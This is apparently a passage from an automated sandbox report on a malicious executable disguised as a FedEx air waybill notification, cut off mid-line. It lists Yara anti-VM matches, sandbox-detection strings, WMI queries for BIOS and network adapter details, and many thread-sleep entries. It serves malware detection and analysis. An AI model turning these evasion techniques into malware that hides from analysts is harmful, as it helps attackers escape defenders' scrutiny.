Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match | File source: 0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.2f09098.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.2f9c210.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.261292872.0000000002F26000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe PID: 5244, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261292872.0000000002F26000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261292872.0000000002F26000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -239889s >= -30000s
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 6036 | Thread sleep count: 1650 > 30
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 5028 | Thread sleep time: -40928s >= -30000s
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 6036 | Thread sleep count: 439 > 30
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -239781s >= -30000s
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -239671s >= -30000s
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -239543s >= -30000s
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -239420s >= -30000s
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -239309s >= -30000s
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -239195s >= -30000s
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -239063s >= -30000s
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -238937s >= -30000s
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -238813s >= -30000s
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -238671s >= -30000s
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -238562s >= -30000s
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -238453s >= -30000s
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -238344s >= -30000s
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -238063s >= -30000s
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488